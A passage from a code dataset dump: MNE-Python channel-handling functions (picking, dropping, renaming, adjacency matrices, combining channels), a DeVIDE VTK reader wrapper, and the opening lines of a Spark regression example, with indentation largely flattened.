return self._pick_drop_channels(picks)
def reorder_channels(self, ch_names):
"""Reorder channels.
Parameters
----------
ch_names : list
The desired channel order.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
pick_channels
Notes
-----
Channel names must be unique. Channels that are not in ``ch_names``
are dropped.
.. versionadded:: 0.16.0
"""
_check_excludes_includes(ch_names)
idx = list()
for ch_name in ch_names:
ii = self.ch_names.index(ch_name)
if ii in idx:
raise ValueError('Channel name repeated: %s' % (ch_name,))
idx.append(ii)
return self._pick_drop_channels(idx)
def drop_channels(self, ch_names):
"""Drop channel(s).
Parameters
----------
ch_names : iterable or str
Iterable (e.g. list) of channel name(s) or channel name to remove.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
reorder_channels
pick_channels
pick_types
Notes
-----
.. versionadded:: 0.9.0
"""
if isinstance(ch_names, str):
ch_names = [ch_names]
try:
all_str = all([isinstance(ch, str) for ch in ch_names])
except TypeError:
raise ValueError("'ch_names' must be iterable, got "
"type {} ({}).".format(type(ch_names), ch_names))
if not all_str:
raise ValueError("Each element in 'ch_names' must be str, got "
"{}.".format([type(ch) for ch in ch_names]))
missing = [ch for ch in ch_names if ch not in self.ch_names]
if len(missing) > 0:
msg = "Channel(s) {0} not found, nothing dropped."
raise ValueError(msg.format(", ".join(missing)))
bad_idx = [self.ch_names.index(ch) for ch in ch_names
if ch in self.ch_names]
idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
return self._pick_drop_channels(idx)
def _pick_drop_channels(self, idx):
# avoid circular imports
from ..io import BaseRaw
from ..time_frequency import AverageTFR, EpochsTFR
if not isinstance(self, BaseRaw):
_check_preload(self, 'adding, dropping, or reordering channels')
if getattr(self, 'picks', None) is not None:
self.picks = self.picks[idx]
if getattr(self, '_read_picks', None) is not None:
self._read_picks = [r[idx] for r in self._read_picks]
if hasattr(self, '_cals'):
self._cals = self._cals[idx]
pick_info(self.info, idx, copy=False)
if getattr(self, '_projector', None) is not None:
self._projector = self._projector[idx][:, idx]
# All others (Evoked, Epochs, Raw) have chs axis=-2
axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
if hasattr(self, '_data'): # skip non-preloaded Raw
self._data = self._data.take(idx, axis=axis)
else:
assert isinstance(self, BaseRaw) and not self.preload
self._pick_projs()
return self
def _pick_projs(self):
"""Keep only projectors which apply to at least 1 data channel."""
drop_idx = []
for idx, proj in enumerate(self.info['projs']):
if not set(self.info['ch_names']) & set(proj['data']['col_names']):
drop_idx.append(idx)
for idx in drop_idx:
logger.info(f"Removing projector {self.info['projs'][idx]}")
if drop_idx and hasattr(self, 'del_proj'):
self.del_proj(drop_idx)
return self
def add_channels(self, add_list, force_update_info=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
            A list of objects to append to self. All entries must be of the
            same type as the current object.
force_update_info : bool
If True, force the info for objects to be appended to match the
values in ``self``. This should generally only be used when adding
stim channels for which important metadata won't be overwritten.
.. versionadded:: 0.12
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
Notes
-----
If ``self`` is a Raw instance that has been preloaded into a
:obj:`numpy.memmap` instance, the memmap will be resized.
"""
# avoid circular imports
from ..io import BaseRaw, _merge_info
from ..epochs import BaseEpochs
_validate_type(add_list, (list, tuple), 'Input')
# Object-specific checks
for inst in add_list + [self]:
_check_preload(inst, "adding channels")
if isinstance(self, BaseRaw):
con_axis = 0
comp_class = BaseRaw
elif isinstance(self, BaseEpochs):
con_axis = 1
comp_class = BaseEpochs
else:
con_axis = 0
comp_class = type(self)
for inst in add_list:
_validate_type(inst, comp_class, 'All input')
data = [inst._data for inst in [self] + add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
for shape in shapes:
if not ((shapes[0] - shape) == 0).all():
raise AssertionError('All data dimensions except channels '
'must match, got %s != %s'
% (shapes[0], shape))
del shapes
# Create final data / info objects
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos, force_update_to_first=force_update_info)
# Now update the attributes
if isinstance(self._data, np.memmap) and con_axis == 0 and \
sys.platform != 'darwin': # resizing not available--no mremap
# Use a resize and fill in other ones
out_shape = (sum(d.shape[0] for d in data),) + data[0].shape[1:]
n_bytes = np.prod(out_shape) * self._data.dtype.itemsize
self._data.flush()
self._data.base.resize(n_bytes)
self._data = np.memmap(self._data.filename, mode='r+',
dtype=self._data.dtype, shape=out_shape)
assert self._data.shape == out_shape
assert self._data.nbytes == n_bytes
offset = len(data[0])
for d in data[1:]:
this_len = len(d)
self._data[offset:offset + this_len] = d
offset += this_len
else:
self._data = np.concatenate(data, axis=con_axis)
self.info = new_info
if isinstance(self, BaseRaw):
self._cals = np.concatenate([getattr(inst, '_cals')
for inst in [self] + add_list])
# We should never use these since data are preloaded, let's just
# set it to something large and likely to break (2 ** 31 - 1)
extra_idx = [2147483647] * sum(info['nchan'] for info in infos[1:])
assert all(len(r) == infos[0]['nchan'] for r in self._read_picks)
self._read_picks = [
np.concatenate([r, extra_idx]) for r in self._read_picks]
assert all(len(r) == self.info['nchan'] for r in self._read_picks)
return self
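    # Usage sketch for ``add_channels``: build a stim channel with a matching
    # sampling rate and append it (names and data are hypothetical)::
    #
    #     >>> data = np.zeros((1, len(raw.times)))  # doctest: +SKIP
    #     >>> info = create_info(['STI_NEW'], raw.info['sfreq'], ['stim'])  # doctest: +SKIP
    #     >>> raw.add_channels([mne.io.RawArray(data, info)],
    #     ...                  force_update_info=True)  # doctest: +SKIP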
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def interpolate_bads(self, reset_bads=True, mode='accurate',
origin='auto', method=None, verbose=None):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used for interpolation of channels
using the minimum-norm method.
origin : array-like, shape (3,) | str
Origin of the sphere in the head coordinate frame and in meters.
Can be ``'auto'`` (default), which means a head-digitization-based
origin fit.
.. versionadded:: 0.17
method : dict
Method to use for each channel type.
Currently only the key "eeg" has multiple options:
- ``"spline"`` (default)
Use spherical spline interpolation.
- ``"MNE"``
Use minimum-norm projection to a sphere and back.
This is the method used for MEG channels.
The value for "meg" is "MNE", and the value for
"fnirs" is "nearest". The default (None) is thus an alias for::
method=dict(meg="MNE", eeg="spline", fnirs="nearest")
.. versionadded:: 0.21
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
Notes
-----
.. versionadded:: 0.9.0
"""
from ..bem import _check_origin
from .interpolation import _interpolate_bads_eeg,\
_interpolate_bads_meeg, _interpolate_bads_nirs
_check_preload(self, "interpolation")
method = _handle_default('interpolation_method', method)
for key in method:
_check_option('method[key]', key, ('meg', 'eeg', 'fnirs'))
_check_option("method['eeg']", method['eeg'], ('spline', 'MNE'))
_check_option("method['meg']", method['meg'], ('MNE',))
_check_option("method['fnirs']", method['fnirs'], ('nearest',))
if len(self.info['bads']) == 0:
warn('No bad channels to interpolate. Doing nothing...')
return self
logger.info('Interpolating bad channels')
origin = _check_origin(origin, self.info)
if method['eeg'] == 'spline':
_interpolate_bads_eeg(self, origin=origin)
eeg_mne = False
else:
eeg_mne = True
_interpolate_bads_meeg(self, mode=mode, origin=origin, eeg=eeg_mne)
_interpolate_bads_nirs(self)
if reset_bads is True:
self.info['bads'] = []
return self
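    # Usage sketch for ``interpolate_bads`` (the bad channel name is
    # hypothetical)::
    #
    #     >>> raw.info['bads'] = ['EEG 053']  # doctest: +SKIP
    #     >>> raw.interpolate_bads(reset_bads=True)  # doctest: +SKIP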
@fill_doc
def rename_channels(info, mapping):
"""Rename channels.
.. warning:: The channel names must have at most 15 characters
Parameters
----------
info : dict
Measurement info to modify.
%(rename_channels_mapping)s
"""
_validate_type(info, Info, 'info')
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
for new_name in new_names:
_validate_type(new_name[1], 'str', 'New channel mappings')
    bad_new_names = [name for _, name in new_names if len(name) > 15]
    if len(bad_new_names):
        raise ValueError('Channel names cannot be longer than 15 '
                         'characters. These channel names are not '
                         'valid: %s' % bad_new_names)
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the remapping in info
info['bads'] = bads
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._update_redundant()
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
@fill_doc
def read_ch_adjacency(fname, picks=None):
"""Parse FieldTrip neighbors .mat file.
More information on these neighbor definitions can be found on the related
`FieldTrip documentation pages
<http://www.fieldtriptoolbox.org/template/neighbours/>`__.
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
    %(picks_all)s
        Picks must match the template.
Returns
-------
ch_adjacency : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
See Also
--------
find_ch_adjacency
Notes
-----
This function is closely related to :func:`find_ch_adjacency`. If you
don't know the correct file for the neighbor definitions,
:func:`find_ch_adjacency` can compute the adjacency matrix from 2d
sensor locations.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], str)
picks = _picks_to_idx(len(ch_names), picks)
neighbors = [_recursive_flatten(c, str) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
adjacency = _ch_neighbor_adjacency(ch_names, neighbors)
# picking before constructing matrix is buggy
adjacency = adjacency[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return adjacency, ch_names
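# Usage sketch for ``read_ch_adjacency`` with a shipped FieldTrip template::
#
#     >>> adjacency, ch_names = read_ch_adjacency('neuromag306mag')  # doctest: +SKIP
#     >>> adjacency.shape == (len(ch_names), len(ch_names))  # doctest: +SKIP
#     True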
def _ch_neighbor_adjacency(ch_names, neighbors):
"""Compute sensor adjacency matrix.
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_adjacency : scipy.sparse matrix
The adjacency matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = {c for d in neighbors for c in d}
rest = set_neighbors - set(ch_names)
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
        if (not isinstance(neigh, list) or
not all(isinstance(c, str) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_adjacency = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
ch_adjacency[ii, [ch_names.index(i) for i in neigbs]] = True
ch_adjacency = sparse.csr_matrix(ch_adjacency)
return ch_adjacency
def find_ch_adjacency(info, ch_type):
"""Find the adjacency matrix for the given channels.
This function tries to infer the appropriate adjacency matrix template
for the given channels. If a template is not found, the adjacency matrix
is computed using Delaunay triangulation based on 2d sensor locations.
Parameters
----------
info : instance of Info
The measurement info.
ch_type : str | None
The channel type for computing the adjacency matrix. Currently
supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
only one channel type.
Returns
-------
ch_adjacency : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
See Also
--------
read_ch_adjacency
Notes
-----
.. versionadded:: 0.15
Automatic detection of an appropriate adjacency matrix template only
works for MEG data at the moment. This means that the adjacency matrix
is always computed for EEG data and never loaded from a template file. If
you want to load a template for a given montage use
:func:`read_ch_adjacency` directly.
"""
if ch_type is None:
picks = channel_indices_by_type(info)
if sum([len(p) != 0 for p in picks.values()]) != 1:
raise ValueError('info must contain only one channel type if '
'ch_type is None.')
ch_type = channel_type(info, 0)
else:
_check_option('ch_type', ch_type, ['mag', 'grad', 'eeg'])
(has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only,
has_neuromag_122_grad, has_csd_coils) = _get_ch_info(info)
conn_name = None
if has_vv_mag and ch_type == 'mag':
conn_name = 'neuromag306mag'
elif has_vv_grad and ch_type == 'grad':
conn_name = 'neuromag306planar'
elif has_neuromag_122_grad:
conn_name = 'neuromag122'
elif has_4D_mag:
if 'MEG 248' in info['ch_names']:
idx = info['ch_names'].index('MEG 248')
grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
if ch_type == 'grad' and grad:
conn_name = 'bti248grad'
elif ch_type == 'mag' and mag:
conn_name = 'bti248'
elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
idx = info['ch_names'].index('MEG 148')
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
conn_name = 'bti148'
elif has_CTF_grad and ch_type == 'mag':
if info['nchan'] < 100:
conn_name = 'ctf64'
elif info['nchan'] > 200:
conn_name = 'ctf275'
else:
conn_name = 'ctf151'
elif n_kit_grads > 0:
from ..io.kit.constants import KIT_NEIGHBORS
conn_name = KIT_NEIGHBORS.get(info['kit_system_id'])
if conn_name is not None:
logger.info('Reading adjacency matrix for %s.' % conn_name)
return read_ch_adjacency(conn_name)
    logger.info('Could not find an adjacency matrix for the data. '
                'Computing adjacency based on Delaunay triangulations.')
return _compute_ch_adjacency(info, ch_type)
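# Usage sketch for ``find_ch_adjacency`` (``raw`` is a hypothetical loaded
# dataset)::
#
#     >>> adjacency, ch_names = find_ch_adjacency(raw.info, ch_type='grad')  # doctest: +SKIP
#
# A template is loaded when the acquisition system is recognized; otherwise
# the matrix is computed from the 2d sensor positions via Delaunay
# triangulation.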
def _compute_ch_adjacency(info, ch_type):
"""Compute channel adjacency matrix using Delaunay triangulations.
Parameters
----------
    info : instance of Info
The measurement info.
ch_type : str
The channel type for computing the adjacency matrix. Currently
supports 'mag', 'grad' and 'eeg'.
Returns
-------
ch_adjacency : scipy.sparse matrix, shape (n_channels, n_channels)
The adjacency matrix.
ch_names : list
The list of channel names present in adjacency matrix.
"""
from scipy.spatial import Delaunay
from .. import spatial_tris_adjacency
from ..channels.layout import _find_topomap_coords, _pair_grad_sensors
combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
np.unique([ch['coil_type'] for ch in info['chs']]))
picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
ch_names = [info['ch_names'][pick] for pick in picks]
if combine_grads:
pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
if len(pairs) != len(picks):
raise RuntimeError('Cannot find a pair for some of the '
'gradiometers. Cannot compute adjacency '
'matrix.')
        # use the position of only one gradiometer from each pair
xy = _find_topomap_coords(info, picks[::2], sphere=HEAD_SIZE_DEFAULT)
else:
xy = _find_topomap_coords(info, picks, sphere=HEAD_SIZE_DEFAULT)
tri = Delaunay(xy)
neighbors = spatial_tris_adjacency(tri.simplices)
if combine_grads:
ch_adjacency = np.eye(len(picks), dtype=bool)
for idx, neigbs in zip(neighbors.row, neighbors.col):
for ii in range(2): # make sure each pair is included
for jj in range(2):
ch_adjacency[idx * 2 + ii, neigbs * 2 + jj] = True
ch_adjacency[idx * 2 + ii, idx * 2 + jj] = True # pair
ch_adjacency = sparse.csr_matrix(ch_adjacency)
else:
ch_adjacency = sparse.lil_matrix(neighbors)
ch_adjacency.setdiag(np.repeat(1, ch_adjacency.shape[0]))
ch_adjacency = ch_adjacency.tocsr()
return ch_adjacency, ch_names
def fix_mag_coil_types(info, use_cal=False):
"""Fix magnetometer coil types.
Parameters
----------
info : dict
The info dict to correct. Corrections are done in-place.
use_cal : bool
If True, further refine the check for old coil types by checking
``info['chs'][ii]['cal']``.
Notes
-----
This function changes magnetometer coil types 3022 (T1: SQ20483N) and
3023 (T2: SQ20483-A) to 3024 (T3: SQ20950N) in the channel definition
records in the info structure.
Neuromag Vectorview systems can contain magnetometers with two
different coil sizes (3022 and 3023 vs. 3024). The systems
incorporating coils of type 3024 were introduced last and are used at
the majority of MEG sites. At some sites with 3024 magnetometers,
the data files have still defined the magnetometers to be of type
3022 to ensure compatibility with older versions of Neuromag software.
In the MNE software as well as in the present version of Neuromag
software coil type 3024 is fully supported. Therefore, it is now safe
to upgrade the data files to use the true coil type.
.. note:: The effect of the difference between the coil sizes on the
current estimates computed by the MNE software is very small.
Therefore the use of ``fix_mag_coil_types`` is not mandatory.
"""
old_mag_inds = _get_T1T2_mag_inds(info, use_cal)
for ii in old_mag_inds:
info['chs'][ii]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
logger.info('%d of %d magnetometer types replaced with T3.' %
(len(old_mag_inds), len(pick_types(info, meg='mag'))))
info._check_consistency()
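# Usage sketch for ``fix_mag_coil_types`` (``raw`` is hypothetical; the info
# dict is corrected in place)::
#
#     >>> fix_mag_coil_types(raw.info)  # doctest: +SKIP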
def _get_T1T2_mag_inds(info, use_cal=False):
"""Find T1/T2 magnetometer coil types."""
picks = pick_types(info, meg='mag')
old_mag_inds = []
# From email exchanges, systems with the larger T2 coil only use the cal
# value of 2.09e-11. Newer T3 magnetometers use 4.13e-11 or 1.33e-10
# (Triux). So we can use a simple check for > 3e-11.
for ii in picks:
ch = info['chs'][ii]
if ch['coil_type'] in (FIFF.FIFFV_COIL_VV_MAG_T1,
FIFF.FIFFV_COIL_VV_MAG_T2):
if use_cal:
if ch['cal'] > 3e-11:
old_mag_inds.append(ii)
else:
old_mag_inds.append(ii)
return old_mag_inds
def _get_ch_info(info):
"""Get channel info for inferring acquisition device."""
chs = info['chs']
# Only take first 16 bits, as higher bits store CTF comp order
coil_types = {ch['coil_type'] & 0xFFFF for ch in chs}
channel_types = {ch['kind'] for ch in chs}
has_vv_mag = any(k in coil_types for k in
[FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
FIFF.FIFFV_COIL_VV_MAG_T3])
has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
FIFF.FIFFV_COIL_VV_PLANAR_T2,
FIFF.FIFFV_COIL_VV_PLANAR_T3])
has_neuromag_122_grad = any(k in coil_types
for k in [FIFF.FIFFV_COIL_NM_122])
is_old_vv = ' ' in chs[0]['ch_name']
has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
FIFF.FIFFV_COIL_CTF_REF_GRAD,
FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
(FIFF.FIFFV_MEG_CH in channel_types and
any(k in ctf_other_types for k in coil_types)))
# hack due to MNE-C bug in IO of CTF
# only take first 16 bits, as higher bits store CTF comp order
n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
for ch in chs)
has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
n_kit_grads])
has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
has_eeg_coils_only = has_eeg_coils and not has_any_meg
has_csd_coils = (FIFF.FIFFV_COIL_EEG_CSD in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only, has_neuromag_122_grad,
has_csd_coils)
def make_1020_channel_selections(info, midline="z"):
"""Return dict mapping from ROI names to lists of picks for 10/20 setups.
This passes through all channel names, and uses a simple heuristic to
separate channel names into three Region of Interest-based selections:
Left, Midline and Right. The heuristic is that channels ending on any of
the characters in ``midline`` are filed under that heading, otherwise those
ending in odd numbers under "Left", those in even numbers under "Right".
Other channels are ignored. This is appropriate for 10/20 files, but not
for other channel naming conventions.
If an info object is provided, lists are sorted from posterior to anterior.
Parameters
----------
info : instance of Info
Where to obtain the channel names from. The picks will
be in relation to the position in ``info["ch_names"]``. If possible,
        these lists will be sorted by the y position of the channel locations,
i.e., from back to front.
midline : str
Names ending in any of these characters are stored under the
``Midline`` key. Defaults to 'z'. Note that capitalization is ignored.
Returns
-------
selections : dict
A dictionary mapping from ROI names to lists of picks (integers).
"""
_validate_type(info, "info")
try:
from .layout import find_layout
layout = find_layout(info)
pos = layout.pos
ch_names = layout.names
except RuntimeError: # no channel positions found
ch_names = info["ch_names"]
pos = None
selections = dict(Left=[], Midline=[], Right=[])
for pick, channel in enumerate(ch_names):
last_char = channel[-1].lower() # in 10/20, last char codes hemisphere
if last_char in midline:
selection = "Midline"
elif last_char.isdigit():
selection = "Left" if int(last_char) % 2 else "Right"
else: # ignore the channel
continue
selections[selection].append(pick)
if pos is not None:
        # sort channels from back (posterior) to front (anterior), using the
        # y-coordinate of the position info in the layout
selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
for selection, picks in selections.items()}
return selections
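# A hedged sketch for ``make_1020_channel_selections`` on a minimal 10/20-style
# info without channel positions (so picks keep their order of appearance)::
#
#     >>> info = create_info(['Fp1', 'Fpz', 'Fp2', 'O1', 'Oz', 'O2'],
#     ...                    1000., 'eeg')  # doctest: +SKIP
#     >>> make_1020_channel_selections(info)  # doctest: +SKIP
#     {'Left': [0, 3], 'Midline': [1, 4], 'Right': [2, 5]}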
def combine_channels(inst, groups, method='mean', keep_stim=False,
drop_bad=False):
"""Combine channels based on specified channel grouping.
Parameters
----------
inst : instance of Raw, Epochs, or Evoked
An MNE-Python object to combine the channels for. The object can be of
type Raw, Epochs, or Evoked.
groups : dict
Specifies which channels are aggregated into a single channel, with
aggregation method determined by the ``method`` parameter. One new
pseudo-channel is made per dict entry; the dict values must be lists of
picks (integer indices of ``ch_names``). For example::
groups=dict(Left=[1, 2, 3, 4], Right=[5, 6, 7, 8])
Note that within a dict entry all channels must have the same type.
method : str | callable
Which method to use to combine channels. If a :class:`str`, must be one
of 'mean', 'median', or 'std' (standard deviation). If callable, the
callable must accept one positional input (data of shape ``(n_channels,
n_times)``, or ``(n_epochs, n_channels, n_times)``) and return an
:class:`array <numpy.ndarray>` of shape ``(n_times,)``, or ``(n_epochs,
n_times)``. For example with an instance of Raw or Evoked::
method = lambda data: np.mean(data, axis=0)
Another example with an instance of Epochs::
method = lambda data: np.median(data, axis=1)
Defaults to ``'mean'``.
keep_stim : bool
If ``True``, include stimulus channels in the resulting object.
Defaults to ``False``.
drop_bad : bool
If ``True``, drop channels marked as bad before combining. Defaults to
``False``.
Returns
-------
combined_inst : instance of Raw, Epochs, or Evoked
An MNE-Python object of the same type as the input ``inst``, containing
one virtual channel for each group in ``groups`` (and, if ``keep_stim``
is ``True``, also containing stimulus channels).
"""
from ..io import BaseRaw, RawArray
from .. import BaseEpochs, EpochsArray, Evoked, EvokedArray
ch_axis = 1 if isinstance(inst, BaseEpochs) else 0
ch_idx = list(range(inst.info['nchan']))
ch_names = inst.info['ch_names']
ch_types = inst.get_channel_types()
inst_data = inst.data if isinstance(inst, Evoked) else inst.get_data()
groups = OrderedDict(deepcopy(groups))
# Convert string values of ``method`` into callables
# XXX Possibly de-duplicate with _make_combine_callable of mne/viz/utils.py
if isinstance(method, str):
method_dict = {key: partial(getattr(np, key), axis=ch_axis)
for key in ('mean', 'median', 'std')}
try:
method = method_dict[method]
except KeyError:
raise ValueError('"method" must be a callable, or one of "mean", '
f'"median", or "std"; got "{method}".')
# Instantiate channel info and data
new_ch_names, new_ch_types, new_data = [], [], []
if not isinstance(keep_stim, bool):
raise TypeError('"keep_stim" must be of type bool, not '
f'{type(keep_stim)}.')
if keep_stim:
stim_ch_idx = list(pick_types(inst.info, meg=False, stim=True))
if stim_ch_idx:
new_ch_names = [ch_names[idx] for idx in stim_ch_idx]
new_ch_types = [ch_types[idx] for idx in stim_ch_idx]
new_data = [np.take(inst_data, idx, axis=ch_axis)
for idx in stim_ch_idx]
else:
warn('Could not find stimulus channels.')
# Get indices of bad channels
ch_idx_bad = []
if not isinstance(drop_bad, bool):
raise TypeError('"drop_bad" must be of type bool, not '
f'{type(drop_bad)}.')
if drop_bad and inst.info['bads']:
ch_idx_bad = pick_channels(ch_names, inst.info['bads'])
# Check correctness of combinations
for this_group, this_picks in groups.items():
# Check if channel indices are out of bounds
if not all(idx in ch_idx for idx in this_picks):
raise ValueError('Some channel indices are out of bounds.')
# Check if heterogeneous sensor type combinations
this_ch_type = np.array(ch_types)[this_picks]
if len(set(this_ch_type)) > 1:
types = ', '.join(set(this_ch_type))
raise ValueError('Cannot combine sensors of different types; '
f'"{this_group}" contains types {types}.')
# Remove bad channels
these_bads = [idx for idx in this_picks if idx in ch_idx_bad]
this_picks = [idx for idx in this_picks if idx not in ch_idx_bad]
if these_bads:
logger.info('Dropped the following channels in group '
f'{this_group}: {these_bads}')
        # Check if combining fewer than 2 channels
        if len(set(this_picks)) < 2:
            warn(f'Fewer than 2 channels in group "{this_group}" when '
                 f'combining by method "{method}".')
        # If all good, create a more detailed dict without bad channels
groups[this_group] = dict(picks=this_picks, ch_type=this_ch_type[0])
# Combine channels and add them to the new instance
for this_group, this_group_dict in groups.items():
new_ch_names.append(this_group)
new_ch_types.append(this_group_dict['ch_type'])
this_picks = this_group_dict['picks']
this_data = np.take(inst_data, this_picks, axis=ch_axis)
new_data.append(method(this_data))
new_data = np.swapaxes(new_data, 0, ch_axis)
info = create_info(sfreq=inst.info['sfreq'], ch_names=new_ch_names,
ch_types=new_ch_types)
if isinstance(inst, BaseRaw):
combined_inst = RawArray(new_data, info, first_samp=inst.first_samp,
verbose=inst.verbose)
elif isinstance(inst, BaseEpochs):
combined_inst = EpochsArray(new_data, info, tmin=inst.times[0],
verbose=inst.verbose)
elif isinstance(inst, Evoked):
combined_inst = EvokedArray(new_data, info, tmin=inst.times[0],
verbose=inst.verbose)
return combined_inst
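# Usage sketch for ``combine_channels`` (the picks are hypothetical indices of
# same-type channels)::
#
#     >>> groups = dict(Left=[1, 2, 3], Right=[4, 5, 6])  # doctest: +SKIP
#     >>> combined = combine_channels(raw, groups, method='mean')  # doctest: +SKIP
#     >>> combined.ch_names  # doctest: +SKIP
#     ['Left', 'Right']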
|
Teekuningas/mne-python
|
mne/channels/channels.py
|
Python
|
bsd-3-clause
| 66,479
|
[
"Mayavi"
] |
241d5f76705c3e88b9b463d1a9c39acddeb44aa0411a88c01ef6d0bc2d0a710c
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkMFIXReader(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkMFIXReader(), 'Reading vtkMFIX.',
(), ('vtkMFIX',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
nagyistoce/devide
|
modules/vtk_basic/vtkMFIXReader.py
|
Python
|
bsd-3-clause
| 468
|
[
"VTK"
] |
5754f251550747634045208d5d339ea2eaa09c916f9b8ee2f03a048fdd06b59b
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.sql import SparkSession
# $example on$
from pyspark.ml.regression import GeneralizedLinearRegression
# $example off$
"""
An example demonstrating generalized linear regression.
Run with:
bin/spark-submit examples/src/main/python/ml/generalized_linear_regression_example.py
"""
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("GeneralizedLinearRegressionExample")\
.getOrCreate()
# $example on$
# Load training data
dataset = spark.read.format("libsvm")\
